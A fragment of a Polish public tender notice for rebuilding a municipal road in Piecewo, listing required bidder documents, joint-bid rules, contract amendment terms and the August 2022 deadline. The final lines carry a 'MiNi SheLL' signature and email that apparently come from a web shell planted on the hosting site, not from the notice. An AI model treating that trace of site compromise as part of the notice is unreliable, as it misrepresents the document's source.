§ 2 ust. 1 pkt 1, 2 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy,<br/>2)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 PZP, art. 108 ust. 1 pkt 6 PZP, art. 109 ust. 1 pkt 8 PZP, 109 ust. 1 pkt 10 PZP,<br/>3)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o:<br/>•	braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę<br/>albo <br/>•	przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Od wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. UWAGA - Treść wykazu, o którym mowa powyżej, musi potwierdzać spełnianie przez Wykonawcę warunku, o którym mowa w rozdziale XII ust. 2 pkt 4 lit. a) SWZ. Wzór wykazu stanowi załącznik nr 8 do SWZ;<br/><br/>Od wykonawcy, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego o którym mowa w art. 274 ust. 1 PZP, w celu wykazania minimalnych zdolności, będzie wymagane przedłożenie podmiotowego środka dowodowego w postaci wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu zawarto w załączniku nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe (jeśli dotyczy) potwierdzające, że proponowane przez wykonawcę: rozwiązania, elementy, materiały, urządzenia są równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w załączonej dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w SWZ. Przedmiotowe środki dowodowe należy przedłożyć w formie dokumentów wskazanych w rozdziale III ust. 11-13 SWZ.<br/>Przedmiotowe środki dowodowe muszą potwierdzać spełnianie wszystkich określonych przez zamawiającego wymagań, w stopniu nie niższym (gorszym) niż wskazane w SWZ.<br/>W przypadku rozwiązań równoważnych zaproponowanych przez wykonawcę w ofercie, powyższe będzie miało zastosowanie odpowiednio do przedstawionych rozwiązań równoważnych.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne zamawiający, na podstawie art. 107 ust. 2 PZP, wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania. Powyższe uzupełnienie nie będzie miało zastosowania w przypadku określonym w art. 107 ust. 3 PZP. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe potwierdzające równoważność, tj. proponowane przez wykonawcę: rozwiązania, elementy, materiały, urządzenia które będą równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w załączonej dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w SWZ. Przedmiotowe środki dowodowe w formie dokumentów wskazanych w rozdziale III ust. 11-13 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składające się na ofertę oraz dokumenty wymagane wraz z ofertą:<br/>1)	Formularz ofertowy. Wzór formularza zawarto w załączniku nr 2 do SWZ;<br/>2)	Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 PZP. Wzory oświadczeń zawarto, odpowiednio, w załączniku nr 3 i załączniku nr 4 do SWZ;<br/>3)	Odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzedzającym, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów (np. pełną nazwę, NIP, REGON, itp.).<br/>Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z KRS lub CEIDG lub innego właściwego rejestru, zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy lub odpowiednio: do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.<br/>4)	Przedmiotowe środki dowodowe (jeśli dotyczy) potwierdzające, że proponowane przez wykonawcę: rozwiązania, elementy, materiały, urządzenia są równoważne dla robót, materiałów, systemów i urządzeń, wskazanych w SWZ i w załączonej dokumentacji, spełniające minimalne wymagania (parametry techniczne) określone przez zamawiającego w SWZ. Przedmiotowe środki dowodowe należy przedłożyć w formie dokumentów wskazanych w rozdziale III ust. 11-13 SWZ.<br/>Przedmiotowe środki dowodowe muszą potwierdzać spełnianie wszystkich określonych przez zamawiającego wymagań, w stopniu nie niższym (gorszym) niż wskazane w SWZ.<br/>W przypadku rozwiązań równoważnych zaproponowanych przez wykonawcę w ofercie, powyższe będzie miało zastosowanie odpowiednio do przedstawionych rozwiązań równoważnych.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne zamawiający, na podstawie art. 107 ust. 2 PZP, wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie, o ile złożona oferta nie będzie podlegała odrzuceniu albo nie zajdą przesłanki unieważnienia postępowania. Powyższe uzupełnienie nie będzie miało zastosowania w przypadku określonym w art. 107 ust. 3 PZP.<br/>5)	Pełnomocnictwo upoważniające do złożenia oferty (jeśli dotyczy);<br/>6)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia - o ile ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, spółki cywilne;<br/>7)	Zobowiązanie podmiotu udostępniającego zasoby, na których zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną wykonawca się powołuje w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy). Wzór zobowiązania zawarto w załączniku nr 5 do SWZ;<br/>8)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, o którym mowa w art. 117 ust. 4 PZP (jeśli dotyczy). Wzór oświadczenia zawarto w załączniku nr 6 do SWZ;<br/>9)	Informacje dot. tajemnicy przedsiębiorstwa wraz z uzasadnieniem spełniania przesłanek określonych w art. 11 ust. 2 ustawy o zwalczaniu nieuczciwej konkurencji (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu:<br/>1) warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP, tj. warunek określony w rozdziale XII ust. 2 pkt 4 lit. a) SWZ (warunek dotyczący doświadczenia) musi spełnić samodzielnie co najmniej jeden z wykonawców,<br/>2) warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 4 PZP, tj. warunek określony w rozdziale XII ust. 2 pkt 4 lit. b) SWZ (warunek dotyczący wykształcenia, uprawnień i doświadczenia osób skierowanych do wykonywania zadań kierownika budowy) musi spełnić samodzielnie co najmniej jeden z wykonawców.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.	W przypadku, o którym mowa w art. 117 ust. 3 PZP, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia zawarto w załączniku nr 6 do SWZ.<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa każdy z wykonawców oddzielnie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Wzór oświadczenia zawarto w załączniku nr 3 do SWZ.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, składając stosowne pełnomocnictwo. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający udzieli jednorazowej zaliczki na poczet wykonania przedmiotu zamówienia w wysokości 5% całkowitego wynagrodzenia ofertowego Wykonawcy. Szczegóły udzielenia i wypłaty zaliczki określono w załączniku nr 7 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian szczegółowo zawarto w Rozdziale 15 Załącznika nr 7 do SWZ.<br/>1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności, w formie aneksu zaakceptowanego przez obie Strony, i będą dopuszczalne w granicach unormowania art. 455 ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych.<br/>2.	Zamawiający dopuszcza zmiany niniejszej umowy w zakresie:<br/>1)	zmiany wysokości wynagrodzenia należnego Wykonawcy:<br/>a)	na warunkach określonych niniejszą umową, w tym w przypadku zlecenia przez Zamawiającego wykonania robót zamiennych lub innych robót (dodatkowych, uzupełniających) w zakresie niezbędnym do wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej lub w zakresie udzielenia zamówień dodatkowych, mających wpływ na realizację robót zgodnie ze sztuką budowlaną, które nie wynikały z dokumentacji technicznej zawartej w załączniku nr 1 do SWZ, a są konieczne do należytego wykonania przedmiotu umowy,<br/>b)	w przypadku konieczności wykonania: robót budowlanych, dostaw, usług, które nie zostały wyszczególnione w dokumentacji technicznej wskazanej w załączniku nr 1 do SWZ, a są konieczne do należytego wykonania przedmiotu umowy lub wynikają z nałożonych na Zamawiającego decyzji administracyjnych lub innych pisemnych wytycznych organów administracji publicznej zobowiązujących inwestora do ich wykonania, <br/>c)	w przypadku konieczności wykonania budowy kanału technologicznego, w zakresie wskazanym w dokumentacji technicznej,<br/>d)	w przypadku dopuszczenia waloryzacji wynagrodzenia Wykonawcy, <br/>e)	w przypadku nagłego i drastycznego wzrostu cen przez co wynagrodzenie ofertowe wykonawcy utraciło charakter świadczenia ekwiwalentnego w stosunku do świadczenia realizowanego,<br/>f)	w przypadku wystąpienia okoliczności noszących znamiona siły wyższej, o której mowa w § 15 ust. 2 pkt 3 lit. e, skutkującej obiektywnie niespodziewanym i nagłym znacznym wzrostem cen mającym bezpośredni wpływ na realizację przedmiotu umowy, przez co realizacja umowy po cenie ofertowej nie będzie miała charakteru ekwiwalentnego i narazi Wykonawcę na rażącą stratę, co Wykonawca jest w stanie szczegółowo wykazać,<br/>g)	w przypadku zmiany wysokości obowiązującej stawki podatku VAT - w sytuacji, gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla robót objętych przedmiotem umowy. Waloryzacja wynagrodzenia, w przypadku zmiany wysokości obowiązującej stawki podatku VAT, dotyczy wyłącznie kosztów realizacji zamówienia powstałych po złożeniu wniosku przez Wykonawcę, nie wcześniej niż w okresie po wejściu w życie odpowiednich przepisów. Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia, określonego w umowie, o kwotę równą różnicy w kwocie podatku, jednakże wyłącznie co do części wynagrodzenia za roboty, których do dnia zmiany stawki podatku VAT jeszcze nie wykonano,<br/>h)	w przypadku zmiany dotychczasowego wykonawcy nowym wykonawcą, w szczególności w wyniku: sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, lub w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1 ustawy Prawo zamówień publicznych,<br/>i) (...);<br/>2)	wprowadzenia lub rezygnacji z udziału w realizacji niniejszej umowy podwykonawców lub dalszych podwykonawców;<br/>3)	terminu realizacji umowy o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu jej zakończenia i/lub materiałów, parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy w następujących sytuacjach: (...). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/643282</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający informuje, że wystąpił do Ministra Cyfryzacji o zwolnienie zarządcy drogi z obowiązku budowy kanału technologicznego związanego z przebudową drogi gminnej nr 080135C w miejscowości Piecewo na działkach nr 20, 35/5, 37/3, 41/4 oraz 43. Obecnie oczekujemy za decyzją administracyjną w przedmiotowej sprawie.<br/>2) Minimalny okres gwarancji jakości na przedmiot zamówienia wynosi 60 miesięcy, licząc od dnia następnego po dacie podpisania protokołu odbioru końcowego. W przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji jakości niż określony przez Zamawiającego, oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 PZP.<br/>3) Okres rękojmi równy jest okresowi gwarancji.<br/>4) Zamawiający informuje, że otrzymał wstępną promesę dotycząca dofinansowania inwestycji, objętej niniejszym postępowaniem o udzielenie zamówienia, ze środków Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych. <br/>W związku z powyższym, Zamawiający informuje, że może unieważnić postępowanie o udzielenie przedmiotowego zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane, a możliwość unieważnienia postępowania na tej podstawie została przewidziana w ogłoszeniu o zamówieniu w postępowaniu prowadzonym w trybie podstawowym. Zamawiający dopuszcza możliwość unieważnienia postępowania, o której mowa w zdaniu poprzednim, na podstawie art. 310 ustawy z 11.09.2019 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2021 r. poz. 1129 ze zm.).<br/>5) Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>6) Zamawiający nie dopuszcza płatności częściowych w zakresie objętym dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych. <br/>7) Zamawiający udzieli jednorazowej zaliczki na poczet wykonania przedmiotu zamówienia w wysokości 5% całkowitego wynagrodzenia ofertowego Wykonawcy. <br/>8) Spory o roszczenia cywilnoprawne w sprawach, w których zawarcie ugody jest dopuszczalne będą poddane mediacjom lub innemu polubownemu rozwiązaniu sporu przez Sądem Polubownym przy Prokuratorii Generalnej Rzeczypospolitej Polskiej, wybranym mediatorem albo osobą prowadzącą inne polubowne rozwiązanie sporu.<br/>9) Zamawiający nie dopuszcza płatności częściowych w zakresie objętym dofinansowaniem z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>10) Zamawiający dopuszcza płatności częściowe dla robót wskazanych w § 1 ust. 10-12 umowy wyłącznie w przypadku, gdy będą one finansowane ze środków własnych Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com